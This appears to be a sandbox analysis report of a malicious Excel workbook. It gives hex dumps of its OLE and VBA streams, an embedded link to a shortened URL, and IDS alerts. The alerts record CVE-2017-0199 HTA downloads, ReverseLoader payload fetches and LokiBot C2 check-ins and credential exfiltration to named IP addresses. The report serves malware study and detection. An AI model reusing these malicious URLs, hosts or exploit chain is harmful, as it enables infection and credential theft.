                                                                                            Data ASCII:P K . . . . . . . . . . ! . . p @ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 13 70 40 80 a3 01 00 00 e2 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/MBD0018D4CE/\x1Ole
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:20
                                                                                            Entropy:0.5689955935892812
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                            Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/MBD0018D4CE/\x3ObjInfo
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:4
                                                                                            Entropy:0.8112781244591328
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . .
                                                                                            Data Raw:00 00 03 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/MBD0018D4CE/Contents
                                                                                            CLSID:
                                                                                            File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                            Stream Size:197671
                                                                                            Entropy:6.989042939766534
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                            Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/Workbook
                                                                                            CLSID:
                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                            Stream Size:212905
                                                                                            Entropy:7.612848324441619
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                                                                                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                            General
                                                                                            Stream Path:MBD000EE997/\x1Ole
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:826
                                                                                            Entropy:5.436920341033941
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . ! ! 0 | . . . . . . . . . . . . . . . . . y . . . K . . . . . h . t . t . p . s . : . / . / . q . r . i . s . n . i . . . m . e . / . g . t . L . s . 6 . A . ? . & . v . o . l . c . a . n . o . = . w . e . t . & . m . u . s . c . l . e . = . c . h . i . l . l . y . & . r . e . s . u . l . t . = . s . a . l . t . y . & . p . e . r . f . u . m . e . = . j . a . z . z . y . & . k . n . i . c . k . e . r . s . = . d . e . p . r . e . s . s . e . d . & . w . a . l . k . = . s . l . o . p . p . y . & . j
                                                                                            Data Raw:01 00 00 02 af f2 21 21 99 30 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 06 02 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 02 02 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 71 00 72 00 69 00 73 00 6e 00 69 00 2e 00 6d 00 65 00 2f 00 67 00 74 00 4c 00 73 00 36 00 41 00 3f 00 26 00 76 00 6f 00 6c 00 63 00 61 00 6e 00 6f 00 3d 00 77 00 65 00 74 00 26 00 6d 00 75 00
                                                                                            General
                                                                                            Stream Path:Workbook
                                                                                            CLSID:
                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                            Stream Size:312403
                                                                                            Entropy:7.99853674566526
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . | B . . . $ t . = m z @ u t . , y o U 1 } . . . . . . . . . . . . \\ . p . . . C ; H N % . e s . . . T , . . B + c " . " [ . h . b . . x . . . ` ^ G . [ . . . ! h ' > . | h \\ Q ~ . P * ' . y . l A P B . . . . a . . . . . . = . . . . 6 } . . . b R 6 6 . y & W ] . . . . . . . . . . . . . . . . . . . . . . e . . . c = . . . z B . . O . 2 < # @ . . . % . . . " . . . ' Q . . . . 3 . . . . . . . 1 . . . [ G @ n H . . . . | f a . . c ; . ] . 1 . . . # 5 7 l
                                                                                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 c5 b4 7c 42 9f c5 05 de c5 b7 de 99 ec 24 9c fb c0 8c c4 d2 de 74 1b 3d 6d 7a ba c0 40 a6 75 74 1a 2c 79 b3 d5 d9 6f e5 cb 55 8a 31 7d f9 05 06 e1 00 02 00 b0 04 c1 00 02 00 b3 98 e2 00 00 00 5c 00 70 00 be c3 ff 10 14 43 a2 97 be 3b 9a 48 4e 25 16 9f 88 cd 65 c4 fc e5 73 80 1d 0d 15 9d 54 2c
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                            CLSID:
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Stream Size:523
                                                                                            Entropy:5.2240749270485995
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:I D = " { E A 7 0 6 E C C - D C 7 9 - 4 D 1 4 - 9 9 F 2 - F C D E C A B F 0 B 2 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 5 0 7 4 8 D F 5 8 6 E 5 C 6 E 5
                                                                                            Data Raw:49 44 3d 22 7b 45 41 37 30 36 45 43 43 2d 44 43 37 39 2d 34 44 31 34 2d 39 39 46 32 2d 46 43 44 45 43 41 42 46 30 42 32 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:104
                                                                                            Entropy:3.0488640812019017
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:2644
                                                                                            Entropy:3.989914272190416
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:553
                                                                                            Entropy:6.371399438846861
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . f - i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                                                            Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 ea 66 2d 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-10-25T19:50:44.185312+02002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1192.3.176.14180192.168.2.2249175TCP
                                                                                            2024-10-25T19:50:46.487655+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164192.3.176.14180TCP
                                                                                            2024-10-25T19:50:46.487667+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.176.14180192.168.2.2249164TCP
                                                                                            2024-10-25T19:50:49.146373+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166192.3.176.14180TCP
                                                                                            2024-10-25T19:50:49.146379+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.176.14180192.168.2.2249166TCP
                                                                                            2024-10-25T19:51:08.991349+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249171192.3.176.14180TCP
                                                                                            2024-10-25T19:51:09.880866+02002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.2249170192.3.176.14180TCP
                                                                                            2024-10-25T19:51:14.806501+02002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.2249172192.3.176.14180TCP
                                                                                            2024-10-25T19:51:33.195456+02002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.250.186.161443192.168.2.2249174TCP
                                                                                            2024-10-25T19:51:50.145221+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917694.156.177.22080TCP
                                                                                            2024-10-25T19:51:50.145221+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917694.156.177.22080TCP
                                                                                            2024-10-25T19:51:50.145221+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917694.156.177.22080TCP
                                                                                            2024-10-25T19:51:51.113562+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224917694.156.177.22080TCP
                                                                                            2024-10-25T19:51:51.616427+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917794.156.177.22080TCP
                                                                                            2024-10-25T19:51:51.616427+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917794.156.177.22080TCP
                                                                                            2024-10-25T19:51:51.616427+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917794.156.177.22080TCP
                                                                                            2024-10-25T19:51:52.585611+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224917794.156.177.22080TCP
                                                                                            2024-10-25T19:51:52.671652+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917894.156.177.22080TCP
                                                                                            2024-10-25T19:51:52.671652+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917894.156.177.22080TCP
                                                                                            2024-10-25T19:51:52.671652+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917894.156.177.22080TCP
                                                                                            2024-10-25T19:51:53.648713+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917894.156.177.22080TCP
                                                                                            2024-10-25T19:51:53.648713+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917894.156.177.22080TCP
                                                                                            2024-10-25T19:51:53.654785+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249178TCP
                                                                                            2024-10-25T19:51:53.908424+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917994.156.177.22080TCP
                                                                                            2024-10-25T19:51:53.908424+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917994.156.177.22080TCP
                                                                                            2024-10-25T19:51:53.908424+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917994.156.177.22080TCP
                                                                                            2024-10-25T19:51:55.136616+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917994.156.177.22080TCP
                                                                                            2024-10-25T19:51:55.136616+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917994.156.177.22080TCP
                                                                                            2024-10-25T19:51:55.136764+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249179TCP
                                                                                            2024-10-25T19:51:55.330639+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918094.156.177.22080TCP
                                                                                            2024-10-25T19:51:55.330639+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918094.156.177.22080TCP
                                                                                            2024-10-25T19:51:55.330639+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918094.156.177.22080TCP
                                                                                            2024-10-25T19:51:56.284539+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918094.156.177.22080TCP
                                                                                            2024-10-25T19:51:56.284539+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918094.156.177.22080TCP
                                                                                            2024-10-25T19:51:56.315085+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249180TCP
                                                                                            2024-10-25T19:51:56.433699+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918194.156.177.22080TCP
                                                                                            2024-10-25T19:51:56.433699+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918194.156.177.22080TCP
                                                                                            2024-10-25T19:51:56.433699+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918194.156.177.22080TCP
                                                                                            2024-10-25T19:51:57.409276+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918194.156.177.22080TCP
                                                                                            2024-10-25T19:51:57.409276+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918194.156.177.22080TCP
                                                                                            2024-10-25T19:51:57.420554+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249181TCP
                                                                                            2024-10-25T19:51:57.559759+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918294.156.177.22080TCP
                                                                                            2024-10-25T19:51:57.559759+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918294.156.177.22080TCP
                                                                                            2024-10-25T19:51:57.559759+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918294.156.177.22080TCP
                                                                                            2024-10-25T19:51:58.522256+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918294.156.177.22080TCP
                                                                                            2024-10-25T19:51:58.522256+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918294.156.177.22080TCP
                                                                                            2024-10-25T19:51:58.528171+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249182TCP
                                                                                            2024-10-25T19:51:59.256821+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918394.156.177.22080TCP
                                                                                            2024-10-25T19:51:59.256821+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918394.156.177.22080TCP
                                                                                            2024-10-25T19:51:59.256821+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918394.156.177.22080TCP
                                                                                            2024-10-25T19:52:00.220924+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918394.156.177.22080TCP
                                                                                            2024-10-25T19:52:00.220924+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918394.156.177.22080TCP
                                                                                            2024-10-25T19:52:00.226865+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249183TCP
                                                                                            2024-10-25T19:52:00.374097+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918494.156.177.22080TCP
                                                                                            2024-10-25T19:52:00.374097+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918494.156.177.22080TCP
                                                                                            2024-10-25T19:52:00.374097+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918494.156.177.22080TCP
                                                                                            2024-10-25T19:52:01.346125+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918494.156.177.22080TCP
                                                                                            2024-10-25T19:52:01.346125+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918494.156.177.22080TCP
                                                                                            2024-10-25T19:52:01.352272+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249184TCP
                                                                                            2024-10-25T19:52:01.495590+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918594.156.177.22080TCP
                                                                                            2024-10-25T19:52:01.495590+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918594.156.177.22080TCP
                                                                                            2024-10-25T19:52:01.495590+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918594.156.177.22080TCP
                                                                                            2024-10-25T19:52:02.484796+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918594.156.177.22080TCP
                                                                                            2024-10-25T19:52:02.484796+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918594.156.177.22080TCP
                                                                                            2024-10-25T19:52:02.491875+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249185TCP
                                                                                            2024-10-25T19:52:02.924655+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918694.156.177.22080TCP
                                                                                            2024-10-25T19:52:02.924655+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918694.156.177.22080TCP
                                                                                            2024-10-25T19:52:02.924655+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918694.156.177.22080TCP
                                                                                            2024-10-25T19:52:03.891131+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918694.156.177.22080TCP
                                                                                            2024-10-25T19:52:03.891131+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918694.156.177.22080TCP
                                                                                            2024-10-25T19:52:03.896823+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249186TCP
                                                                                            2024-10-25T19:52:04.043801+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918794.156.177.22080TCP
                                                                                            2024-10-25T19:52:04.043801+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918794.156.177.22080TCP
                                                                                            2024-10-25T19:52:04.043801+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918794.156.177.22080TCP
                                                                                            2024-10-25T19:52:05.006829+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918794.156.177.22080TCP
                                                                                            2024-10-25T19:52:05.006829+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918794.156.177.22080TCP
                                                                                            2024-10-25T19:52:05.014452+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249187TCP
                                                                                            2024-10-25T19:52:05.183331+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918894.156.177.22080TCP
                                                                                            2024-10-25T19:52:05.183331+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918894.156.177.22080TCP
                                                                                            2024-10-25T19:52:05.183331+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918894.156.177.22080TCP
                                                                                            2024-10-25T19:52:06.185045+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918894.156.177.22080TCP
                                                                                            2024-10-25T19:52:06.185045+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918894.156.177.22080TCP
                                                                                            2024-10-25T19:52:06.190968+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249188TCP
                                                                                            2024-10-25T19:52:06.351136+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918994.156.177.22080TCP
                                                                                            2024-10-25T19:52:06.351136+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918994.156.177.22080TCP
                                                                                            2024-10-25T19:52:06.351136+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918994.156.177.22080TCP
                                                                                            2024-10-25T19:52:07.664194+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918994.156.177.22080TCP
                                                                                            2024-10-25T19:52:07.664194+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918994.156.177.22080TCP
                                                                                            2024-10-25T19:52:07.664910+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249189TCP
                                                                                            2024-10-25T19:52:07.823914+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919094.156.177.22080TCP
                                                                                            2024-10-25T19:52:07.823914+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919094.156.177.22080TCP
                                                                                            2024-10-25T19:52:07.823914+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919094.156.177.22080TCP
                                                                                            2024-10-25T19:52:08.794009+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919094.156.177.22080TCP
                                                                                            2024-10-25T19:52:08.794009+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919094.156.177.22080TCP
                                                                                            2024-10-25T19:52:08.800242+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249190TCP
                                                                                            2024-10-25T19:52:08.973694+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919194.156.177.22080TCP
                                                                                            2024-10-25T19:52:08.973694+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919194.156.177.22080TCP
                                                                                            2024-10-25T19:52:08.973694+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919194.156.177.22080TCP
                                                                                            2024-10-25T19:52:10.025133+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919194.156.177.22080TCP
                                                                                            2024-10-25T19:52:10.025133+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919194.156.177.22080TCP
                                                                                            2024-10-25T19:52:10.031535+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249191TCP
                                                                                            2024-10-25T19:52:10.380036+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919294.156.177.22080TCP
                                                                                            2024-10-25T19:52:10.380036+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919294.156.177.22080TCP
                                                                                            2024-10-25T19:52:10.380036+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919294.156.177.22080TCP
                                                                                            2024-10-25T19:52:11.347349+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919294.156.177.22080TCP
                                                                                            2024-10-25T19:52:11.347349+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919294.156.177.22080TCP
                                                                                            2024-10-25T19:52:11.356894+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249192TCP
                                                                                            2024-10-25T19:52:12.508412+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919394.156.177.22080TCP
                                                                                            2024-10-25T19:52:12.508412+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919394.156.177.22080TCP
                                                                                            2024-10-25T19:52:12.508412+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919394.156.177.22080TCP
                                                                                            2024-10-25T19:52:13.456769+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919394.156.177.22080TCP
                                                                                            2024-10-25T19:52:13.456769+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919394.156.177.22080TCP
                                                                                            2024-10-25T19:52:13.462575+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249193TCP
                                                                                            2024-10-25T19:52:13.973613+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919494.156.177.22080TCP
                                                                                            2024-10-25T19:52:13.973613+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919494.156.177.22080TCP
                                                                                            2024-10-25T19:52:13.973613+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919494.156.177.22080TCP
                                                                                            2024-10-25T19:52:14.951162+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919494.156.177.22080TCP
                                                                                            2024-10-25T19:52:14.951162+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919494.156.177.22080TCP
                                                                                            2024-10-25T19:52:14.956948+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249194TCP
                                                                                            2024-10-25T19:52:15.125319+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919594.156.177.22080TCP
